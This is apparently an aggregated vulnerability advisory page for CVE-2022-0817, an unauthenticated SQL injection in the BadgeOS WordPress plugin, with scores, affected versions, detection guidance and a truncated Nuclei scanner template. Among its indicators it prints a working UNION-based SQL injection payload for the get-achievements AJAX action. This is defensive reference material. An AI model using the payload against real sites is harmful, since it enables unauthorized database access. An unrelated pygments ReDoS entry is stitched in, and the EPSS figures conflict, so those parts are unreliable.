CVE-2022-0817
Published 2022-05-09. CVE-2022-0817: The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL…
Priority P270 · critical · 9.8 · CVSS 3.1 · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 11.48% (95.5th percentile)
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| badgeos | badgeos | <= 3.7.0 | — |
Detection & IOCs (extracted from sources)
- command: `action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -`
- Detect unauthenticated POST requests to /wp-admin/admin-ajax.php with action=get-achievements and SQL UNION injection in the user_id parameter
- Successful exploitation returns HTTP 200 with Content-Type application/json, body containing md5 hash output and the string 'badgeos-arrange-buttons'
- The SQL injection is exploitable by unauthenticated users via the AJAX action get-achievements; monitor for UNION-based payloads in the user_id POST parameter
- Vulnerability affects BadgeOS WordPress plugin through version 3.7.0; version 3.7.1 and above are patched
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 5.5 | MEDIUM | — |
GHSA
GHSA-xx94-r2jp-2426: The BadgeOS WordPress plugin through 3
ghsa_unreviewed · 2022-05-10
CVE-2022-0817 [CRITICAL] CWE-89
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
Red Hat
pygments: ReDoS in pygments
vendor_redhat · 2023-11-26 · CVSS 5.5
CVE-2022-40896 [MEDIUM] CWE-434
A ReDoS issue was discovered in pygments/lexers/smithy.py in pygments through 2.15.0 via SmithyLexer.
A denial-of-service vulnerability related to regular expressions was discovered in Pygments, specifically in the file pygments/lexers/smithy.py. An attacker could exploit this flaw by sending a carefully crafted request, leading to a denial-of-service situation.
Statement: https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages-part-2/
https://data.safetycli.com/vulnerabilities/CVE-2022-40896/58910/?utm_source=pyupio&utm_medium=redirect&utm_campaign=pyup_rd&utm_id=0817&utm_content=data
Mitigation: Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria co
No detection rules found.
Nuclei
CVE-2022-0817 [CRITICAL] WordPress BadgeOS <=3.7.0 - SQL Injection
nuclei · CVSS 9.8
WordPress BadgeOS =3.7.1) to mitigate this vulnerability.
```yaml
reference:
  - https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
  - https://wordpress.org/plugins/badgeos/
  - https://nvd.nist.gov/vuln/detail/CVE-2022-0817
  - https://github.com/20142995/sectool
  - https://github.com/ARPSyndicate/cvemon
classification:
  cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  cvss-score: 9.8
  cve-id: CVE-2022-0817
  cwe-id: CWE-89
  epss-score: 0.64654
  epss-percentile: 0.98463
  cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:*
metadata:
  verified: true
  max-request: 1
  vendor: badgeos
  product: badgeos
  framework: wordpress
tags: cve,cve2022,wp,unauth,sqli,wp-plugin,badgeos,wpscan,wordpress,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Ho
```
Published 2022-05-09